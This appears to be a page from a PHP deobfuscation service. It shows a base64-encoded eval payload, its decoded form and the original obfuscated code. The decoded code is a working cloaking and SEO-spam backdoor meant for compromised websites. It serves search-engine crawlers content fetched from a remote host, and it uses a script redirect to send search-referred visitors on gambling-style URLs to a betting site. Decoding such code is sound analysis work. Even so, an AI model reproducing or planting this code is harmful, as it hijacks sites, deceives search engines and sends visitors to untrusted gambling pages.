Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(base64_decode("CgoKc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKCmRlZml..
Decoded Output download
set_time_limit(0);
error_reporting(0);
define('VERSION', 'EBU81');
define('APIVERSION', 'UXN9HRTu');
define('API', base64_decode('aHR0cHM6Ly8wNHRpcHMuY29tLw=='));
define('API_HTTP', base64_decode('aHR0cDovLzA0dGlwcy5jb20v'));
define('API2', '');
define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CiAgICA8aGVhZD4KICAgICAgICA8dGl0bGU+VGhlIHJlc291cmNlIGNhbm5vdCBiZSBmb3VuZC48L3RpdGxlPgogICAgICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPSJodHRwczovLzA0dGlwcy5jb20vZmFsbGJhY2suaHRtbCI7PC9zY3JpcHQ+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8aDE+Tm90IEZvdW5kPC9oMT4KICAgIDwvYm9keT4KPC9odG1sPgo='));
$req_ref = $_SERVER["HTTP_REFERER"];
$req_ua = $_SERVER["HTTP_USER_AGENT"];
$host = $_SERVER['HTTP_HOST'];
$req_uri = $_SERVER['REQUEST_URI'];
function fetch_prefix() {
}
function insert_html() {
ob_start();
register_shutdown_function('insert_html_end');
}
function insert_html_end() {
$output = ob_get_contents();
ob_end_clean();
}
function is_prefix($uri, $prefix_regex='/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|uri)./') {
return preg_match($prefix_regex, $uri) === 1;
}
function is_crawler($ua) {
$crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!');
foreach ($crawlers as $c) {
if (stripos($ua, $c) !== false) {
return true;
}
}
return false;
}
function is_visitor($ref) {
if (substr($ref, 0, 4) === 'http') {
$refs = array('google.', 'bing.', 'yahoo.');
foreach ($refs as $r) {
if (stripos($ref, $r) !== false) {
return true;
}
}
}
return false;
}
function get_content($url, $conn_timeout=0, $trans_timeout=0) {
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
if(curl_errno($ch)){
$result = NULL;
}
curl_close($ch);
return $result;
}
else {
return file_get_contents($url);
}
}
function get_client_ip(){
foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key){
if (array_key_exists($key, $_SERVER) === true){
foreach (explode(',', $_SERVER[$key]) as $ip){
$ip = trim($ip);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false){
return $ip;
}
}
}
}
}
function main() {
global $req_ref, $req_ua, $host, $req_uri;
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Cache-Control: post-check=0, pre-check=0', FALSE);
header('Pragma: no-cache');
$uri_encoded = urlencode($req_uri);
if (is_crawler($req_ua)) {
$crawler_ip = get_client_ip();
if (is_prefix($req_uri)) {
header('Content-Type:text/html; charset=utf-8');
echo get_content(API_HTTP . "connector.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION);
exit;
}
else {
echo get_content(API_HTTP . "friends.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION);
}
}
elseif (is_prefix($req_uri) && is_visitor($req_ref)) {
header('Content-Type:text/html; charset=utf-8');
$html = '<script>window.location="https://aiapk.bet/hmbet.html";</script>';
echo $html;
exit(0);
$client_ip = get_client_ip();
$html = get_content(API_HTTP . "redirectv1.html?domain={$host}&uri={$uri_encoded}&ip={$client_ip}&ver=" . VERSION . "&v=" . APIVERSION, 3, 3);
echo ($html? $html: FALLBACK_REDIRECT_HTML);
exit;
}
}
main();
Did this file decode correctly?
Original Code
<?php
eval(base64_decode("CgoKc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKCmRlZmluZSgnVkVSU0lPTicsICdFQlU4MScpOwpkZWZpbmUoJ0FQSVZFUlNJT04nLCAnVVhOOUhSVHUnKTsKZGVmaW5lKCdBUEknLCBiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHdOSFJwY0hNdVkyOXRMdz09JykpOwpkZWZpbmUoJ0FQSV9IVFRQJywgYmFzZTY0X2RlY29kZSgnYUhSMGNEb3ZMekEwZEdsd2N5NWpiMjB2JykpOwpkZWZpbmUoJ0FQSTInLCAnJyk7CmRlZmluZSgnRkFMTEJBQ0tfUkVESVJFQ1RfSFRNTCcsIGJhc2U2NF9kZWNvZGUoJ1BHaDBiV3crQ2lBZ0lDQThhR1ZoWkQ0S0lDQWdJQ0FnSUNBOGRHbDBiR1UrVkdobElISmxjMjkxY21ObElHTmhibTV2ZENCaVpTQm1iM1Z1WkM0OEwzUnBkR3hsUGdvZ0lDQWdJQ0FnSUR4elkzSnBjSFErZDJsdVpHOTNMbXh2WTJGMGFXOXVQU0pvZEhSd2N6b3ZMekEwZEdsd2N5NWpiMjB2Wm1Gc2JHSmhZMnN1YUhSdGJDSTdQQzl6WTNKcGNIUStDaUFnSUNBOEwyaGxZV1ErQ2lBZ0lDQThZbTlrZVQ0S0lDQWdJQ0FnSUNBOGFERStUbTkwSUVadmRXNWtQQzlvTVQ0S0lDQWdJRHd2WW05a2VUNEtQQzlvZEcxc1Bnbz0nKSk7CgokcmVxX3JlZiA9ICRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXTsKJHJlcV91YSA9ICRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsKJGhvc3QgPSAkX1NFUlZFUlsnSFRUUF9IT1NUJ107CiRyZXFfdXJpID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CgpmdW5jdGlvbiBmZXRjaF9wcmVmaXgoKSB7Cgp9CgpmdW5jdGlvbiBpbnNlcnRfaHRtbCgpIHsKCW9iX3N0YXJ0KCk7CglyZWdpc3Rlcl9zaHV0ZG93bl9mdW5jdGlvbignaW5zZXJ0X2h0bWxfZW5kJyk7Cn0KCmZ1bmN0aW9uIGluc2VydF9odG1sX2VuZCgpIHsKICAgICRvdXRwdXQgPSBvYl9nZXRfY29udGVudHMoKTsKICAgIG9iX2VuZF9jbGVhbigpOwp9CgpmdW5jdGlvbiBpc19wcmVmaXgoJHVyaSwgJHByZWZpeF9yZWdleD0nL1s/XC9dKGFwcHxpb3N8YW5kcm9pZHxkb3dubG9hZHxibGFua3xiZXR8Y2FzaW5vfGdhbWVzfHBsYXl8dmlkZW98cG9rZXJ8cm9vdHxuZXdzfHBhdHR8dGVlfHN0b3xiZWF8c2xvfGJhY3xwYWN8dGlnfGJtd3xmcnV8YnVsbHxjYXJkfGdvZHN8ZmlzaHxtYWhqfHVyaSkuLycpIHsKCXJldHVybiBwcmVnX21hdGNoKCRwcmVmaXhfcmVnZXgsICR1cmkpID09PSAxOwp9CgpmdW5jdGlvbiBpc19jcmF3bGVyKCR1YSkgewogICAgJGNyYXdsZXJzID0gYXJyYXkoJ0dvb2dsZWJvdCcsICdCaW5nYm90JywgJ01TTkJPVCcsICdZYWhvbyEnKTsKCWZvcmVhY2ggKCRjcmF3bGVycyBhcyAkYykgewoJCWlmIChzdHJpcG9zKCR1YSwgJGMpICE9PSBmYWxzZSkgewoJCQlyZXR1cm4gdHJ1ZTsKCQl9Cgl9CglyZXR1cm4gZmFsc2U7Cn0KCmZ1bmN0aW9uIGlzX3Zpc2l0b3IoJHJlZikgewoJaWYgKHN1YnN0cigkcmVmLCAwLCA0KSA9PT0gJ2h0dHAnKSB7CiAgICAgICAgJHJlZnMgPSBhcnJheSgnZ29vZ2xlLicsICdiaW5nLicsICd5YWhvby4nKTsKCQlmb3JlYWNoICgkcmVmcyBhcyAkcikgewoJCQlpZiAoc3RyaXBvcygkcmVmLCAkcikgIT09IGZhbHNlKSB7CgkJCQlyZXR1cm4gdHJ1ZTsKCQkJfQoJCX0KCX0KCXJldHVybiBmYWxzZTsKfQoKZnVuY3Rpb24gZ2V0X2NvbnRlbnQoJHVybCwgJGNvbm5fdGltZW91dD0wLCAkdHJhbnNfdGltZW91dD0wKSB7CiAgICBpZiAoZnVuY3Rpb25fZXhpc3RzKCdjdXJsX2luaXQnKSkgewogICAgICAgICRjaCA9IGN1cmxfaW5pdCgpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CgkJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKTsKCQljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVGRVJFUiwgJF9TRVJWRVJbIkhUVFBfUkVGRVJFUiJdKTsKCQljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsICRjb25uX3RpbWVvdXQpOwoJCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAkdHJhbnNfdGltZW91dCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCBmYWxzZSk7CgkgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCB0cnVlKTsKICAgICAgICAkcmVzdWx0ID0gY3VybF9leGVjKCRjaCk7CgkJaWYoY3VybF9lcnJubygkY2gpKXsKCQkJJHJlc3VsdCA9IE5VTEw7CgkJfQogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICByZXR1cm4gJHJlc3VsdDsKICAgIH0KCWVsc2UgewogICAgICAgIHJldHVybiBmaWxlX2dldF9jb250ZW50cygkdXJsKTsKICAgIH0KfQpmdW5jdGlvbiBnZXRfY2xpZW50X2lwKCl7CiAgICBmb3JlYWNoIChhcnJheSgnSFRUUF9DTElFTlRfSVAnLCAnSFRUUF9YX1JFQUxfSVAnLCAnSFRUUF9DRl9DT05ORUNUSU5HX0lQJywgJ0hUVFBfWF9GT1JXQVJERURfRk9SJywgJ0hUVFBfWF9GT1JXQVJERUQnLCAnSFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQJywgJ0hUVFBfRk9SV0FSREVEX0ZPUicsICdIVFRQX0ZPUldBUkRFRCcsICdSRU1PVEVfQUREUicpIGFzICRrZXkpewogICAgICAgIGlmIChhcnJheV9rZXlfZXhpc3RzKCRrZXksICRfU0VSVkVSKSA9PT0gdHJ1ZSl7CiAgICAgICAgICAgIGZvcmVhY2ggKGV4cGxvZGUoJywnLCAkX1NFUlZFUlska2V5XSkgYXMgJGlwKXsKICAgICAgICAgICAgICAgICRpcCA9IHRyaW0oJGlwKTsKICAgICAgICAgICAgICAgIGlmIChmaWx0ZXJfdmFyKCRpcCwgRklMVEVSX1ZBTElEQVRFX0lQLCBGSUxURVJfRkxBR19OT19QUklWX1JBTkdFIHwgRklMVEVSX0ZMQUdfTk9fUkVTX1JBTkdFKSAhPT0gZmFsc2UpewogICAgICAgICAgICAgICAgICAgIHJldHVybiAkaXA7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICB9Cn0KCmZ1bmN0aW9uIG1haW4oKSB7CglnbG9iYWwgJHJlcV9yZWYsICRyZXFfdWEsICRob3N0LCAkcmVxX3VyaTsKCWhlYWRlcignQ2FjaGUtQ29udHJvbDogbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUnKTsKCWhlYWRlcignQ2FjaGUtQ29udHJvbDogcG9zdC1jaGVjaz0wLCBwcmUtY2hlY2s9MCcsIEZBTFNFKTsKCWhlYWRlcignUHJhZ21hOiBuby1jYWNoZScpOwoJJHVyaV9lbmNvZGVkID0gdXJsZW5jb2RlKCRyZXFfdXJpKTsKCWlmIChpc19jcmF3bGVyKCRyZXFfdWEpKSB7CgkJJGNyYXdsZXJfaXAgPSBnZXRfY2xpZW50X2lwKCk7CgkJaWYgKGlzX3ByZWZpeCgkcmVxX3VyaSkpIHsKCQkJaGVhZGVyKCdDb250ZW50LVR5cGU6dGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Jyk7CgkJCWVjaG8gZ2V0X2NvbnRlbnQoQVBJX0hUVFAgLiAiY29ubmVjdG9yLmh0bWw/ZG9tYWluPXskaG9zdH0mdXJpPXskdXJpX2VuY29kZWR9JmlwPXskY3Jhd2xlcl9pcH0mdmVyPSIgLiBWRVJTSU9OIC4gIiZ2PSIgLiBBUElWRVJTSU9OKTsKCQkJZXhpdDsKCQl9CgkJZWxzZSB7CgkJCWVjaG8gZ2V0X2NvbnRlbnQoQVBJX0hUVFAgLiAiZnJpZW5kcy5odG1sP2RvbWFpbj17JGhvc3R9JnVyaT17JHVyaV9lbmNvZGVkfSZpcD17JGNyYXdsZXJfaXB9JnZlcj0iIC4gVkVSU0lPTiAuICImdj0iIC4gQVBJVkVSU0lPTik7CgkJfQoJfQoJZWxzZWlmIChpc19wcmVmaXgoJHJlcV91cmkpICYmIGlzX3Zpc2l0b3IoJHJlcV9yZWYpKSB7CgkJaGVhZGVyKCdDb250ZW50LVR5cGU6dGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Jyk7CgkJJGh0bWwgPSAnPHNjcmlwdD53aW5kb3cubG9jYXRpb249Imh0dHBzOi8vYWlhcGsuYmV0L2htYmV0Lmh0bWwiOzwvc2NyaXB0Pic7CgkJZWNobyAkaHRtbDsKCQlleGl0KDApOwoJCSRjbGllbnRfaXAgPSBnZXRfY2xpZW50X2lwKCk7CgkJJGh0bWwgPSBnZXRfY29udGVudChBUElfSFRUUCAuICJyZWRpcmVjdHYxLmh0bWw/ZG9tYWluPXskaG9zdH0mdXJpPXskdXJpX2VuY29kZWR9JmlwPXskY2xpZW50X2lwfSZ2ZXI9IiAuIFZFUlNJT04gLiAiJnY9IiAuIEFQSVZFUlNJT04sIDMsIDMpOwoJCWVjaG8gKCRodG1sPyAkaHRtbDogRkFMTEJBQ0tfUkVESVJFQ1RfSFRNTCk7CgkJZXhpdDsKCX0KfQoKbWFpbigpOw=="));
Function Calls
base64_decode | 1 |
Stats
MD5 | 89f301c2b0ef203aff27167b69b94e1e |
Eval Count | 1 |
Decode Time | 48 ms |